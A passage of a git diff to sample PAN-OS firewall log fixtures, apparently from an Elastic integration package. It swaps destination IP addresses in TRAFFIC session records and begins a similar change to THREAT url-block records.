09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:52,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24985,1,56995,53,0,0,0x200000,udp,allow,251,88,163,2,2012/04/10 04:39:22,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25380,1,59069,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24994,1,55697,53,0,0,0x200000,udp,allow,76,76,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,25451,1,59295,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:51,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,24866,1,59196,80,0,0,0x200000,tcp,allow,1500,578,922,13,2012/04/10 04:39:20,1,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26414,1,59291,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:51,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26131,1,52858,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,26555,1,61383,53,0,0,0x200000,udp,allow,77,77,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,15099,1,59290,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24980,1,59195,80,0,0,0x200000,tcp,allow,28096,1310,26786,39,2012/04/10 04:39:20,0,not-resolved,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,17,22 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26215,1,49812,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25881,1,50185,53,0,0,0x200000,udp,allow,83,83,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,start,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24955,1,59286,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:50,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24961,1,52531,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24226,1,59194,80,0,0,0x200000,tcp,allow,10097,1033,9064,21,2012/04/10 04:39:17,3,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,9 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25129,1,59192,80,0,0,0x200000,tcp,allow,10105,981,9124,22,2012/04/10 04:39:13,7,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25194,1,56463,53,0,0,0x200000,udp,allow,214,77,137,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:50,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26257,1,55849,53,0,0,0x200000,udp,allow,170,77,93,2,2012/04/10 04:39:20,0,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,1,1 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24561,1,59282,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26150,1,57846,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25676,1,51008,53,0,0,0x200000,udp,allow,71,71,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25306,1,59281,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26411,1,55252,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:49,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,24844,1,56995,53,0,0,0x200000,udp,allow,176,176,0,2,2012/04/10 04:39:18,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26335,1,60989,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:49,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,26127,1,59280,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25488,1,53766,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25269,1,56032,53,0,0,0x200000,udp,allow,81,81,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,TRAFFIC,end,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25715,1,59193,80,0,0,0x200000,tcp,allow,1487,581,906,13,2012/04/10 04:39:17,1,entertainment-and-arts,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,26251,1,59279,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25871,1,59278,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:48,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25945,1,59277,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,end,1,2012/04/10 04:39:47,192.168.0.2,192.168.0.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:48,25310,1,60026,53,0,0,0x200000,udp,allow,166,166,0,2,2012/04/10 04:39:16,1,any,0,0,0x0,192.168.0.0-192.168.255.255,192.168.0.0-192.168.255.255,0,2,0 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 -Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1 +Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0 diff --git a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log index 2b6854cf5a5..2c3b2c1917b 100644 --- a/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log +++ b/packages/panw/_dev/deploy/docker/sample_logs/panw-panos-threat.log @@ -1,76 +1,76 @@ -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 